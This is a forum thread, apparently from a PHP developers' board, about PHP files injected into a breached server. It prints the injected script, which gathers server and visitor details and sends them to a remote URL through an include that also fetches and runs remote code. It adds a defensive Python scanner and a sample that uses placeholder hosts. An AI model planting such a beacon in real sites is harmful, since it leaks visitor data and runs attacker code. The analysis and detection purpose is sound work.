Recently a server that I did some work on was breached and two PHP files were added to a directory.
The contents of these files were different, but both completed the same task: they gathered various $_SERVER info and then included from a Russian URL with the info in the GET vars.
Anyway, the one thing that struck me was the script kiddie's use of base64_encode() to 'mask' the URL?!
The last bit puzzled me somewhat. Was this a weak attempt at obfuscation, or is there some other reason (perhaps fooling include/require/PHP into thinking it is not actually including over HTTP? Not likely, I would have thought)?
A Q about someone's code injection..
Buddha443556 (Forum Regular, 873 posts, joined Fri Mar 19, 2004 1:51 pm)
Maugrim_The_Reaper (DevNet Master, 2704 posts, joined Tue Nov 02, 2004 5:43 am, Ireland)
It's the URL to a Russian site along with the info collected from $_SERVER. This is what was injected into one of the files; nothing malicious here, but obviously we don't know what is in the includes:
Where /* removed */ was the URL broken into two and base64-encoded. (The if/else has two different URLs.)
Code:
<? error_reporting(0);
$s="e";
// Each value falls back to the old register_globals name if $_SERVER is unavailable
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
// Every collected value is base64-encoded and joined with "." into one string that becomes the GET query
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
// Try the first remote URL (two base64 halves glued together); if that include fails, fall back to the second
if ((include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str))){}
else {include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str);}
?>
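The base64 wrapper does nothing at runtime: PHP sees the decoded string, so an include of an http:// URL still needs allow_url_include=On (PHP 5.2 and later; before that allow_url_fopen governed it). Its only job is to keep the URL out of a grep and out of signature scanners. A triage script that undoes that, as an added example and not code from this thread: it finds every include/require whose argument is built from base64_decode() literals, decodes the pieces, and prints the URL the server would really fetch. The sample it runs on is constructed here in the shape of the injected file above; the two base64 literals are my placeholders (they decode to "http://" plus "example.invalid" and "backup.invalid"), not the attacker's removed URL.

```python
"""Unmask include/require targets that are assembled from base64_decode() literals."""
import base64
import binascii
import re
from typing import Dict, List

# Constructed sample, same shape as the injected script quoted in the thread.
# The base64 literals are placeholders of my own, not the attacker's real URL.
SAMPLE = r'''<? error_reporting(0);$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("ZXhhbXBsZS5pbnZhbGlk")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("YmFja3VwLmludmFsaWQ=")."/?".$str);} ?>'''

INCLUDE_RE = re.compile(r'\b((?:include|require)(?:_once)?)\b', re.I)
B64_CALL_RE = re.compile(r'^base64_decode\(\s*([\'"])([A-Za-z0-9+/=]+)\1\s*\)$')
STR_LIT_RE = re.compile(r'^([\'"])(.*)\1$', re.S)
URL_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)


def include_argument(src: str, pos: int) -> str:
    """Expression passed to the include/require keyword ending at `pos`.
    Handles `include(expr)` and `include expr;`. Parentheses inside string
    literals are not tracked, which is good enough for triage."""
    i = pos
    while i < len(src) and src[i].isspace():
        i += 1
    if i < len(src) and src[i] == "(":
        depth = 0
        for j in range(i, len(src)):
            if src[j] == "(":
                depth += 1
            elif src[j] == ")":
                depth -= 1
                if depth == 0:
                    return src[i + 1:j]
        return src[i + 1:]
    end = src.find(";", i)
    return src[i:] if end == -1 else src[i:end]


def split_concat(expr: str) -> List[str]:
    """Split a PHP expression on top-level '.' concatenation operators,
    leaving dots inside quotes or parentheses alone."""
    parts, buf, depth, quote = [], [], 0, None
    i = 0
    while i < len(expr):
        ch = expr[i]
        if quote:
            buf.append(ch)
            if ch == "\\" and i + 1 < len(expr):   # keep escaped char verbatim
                buf.append(expr[i + 1])
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == "(":
            depth += 1
            buf.append(ch)
        elif ch == ")":
            depth -= 1
            buf.append(ch)
        elif ch == "." and depth == 0:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def eval_part(part: str) -> str:
    """Statically evaluate one concatenation operand: a base64_decode("...")
    literal or a quoted string. Anything else (variables, other calls) is
    left as a {placeholder} so the reader still sees the URL's shape."""
    m = B64_CALL_RE.match(part)
    if m:
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return "{bad-base64}"
    m = STR_LIT_RE.match(part)
    if m:
        return m.group(2)
    return "{" + part + "}"


def unmask_includes(src: str) -> List[Dict[str, object]]:
    """Report every include/require whose target uses base64_decode(),
    with the decoded target and whether it points at a remote URL."""
    findings = []
    for m in INCLUDE_RE.finditer(src):
        arg = include_argument(src, m.end())
        if "base64_decode" not in arg:
            continue
        target = "".join(eval_part(p) for p in split_concat(arg))
        findings.append({
            "keyword": m.group(1).lower(),
            "target": target,
            "remote": bool(URL_SCHEME_RE.match(target)),
        })
    return findings


if __name__ == "__main__":
    for f in unmask_includes(SAMPLE):
        print(f"{f['keyword']:<12} {'REMOTE' if f['remote'] else 'local':<7} {f['target']}")
```

Run against a suspect webroot with something like `for f in $(grep -rl base64_decode .); do python3 unmask.py "$f"; done` after swapping SAMPLE for the file contents; any finding flagged REMOTE is a remote-file-include beacon, and the `{$str}` placeholder in its target is where the base64-encoded $_SERVER values from the script above get sent.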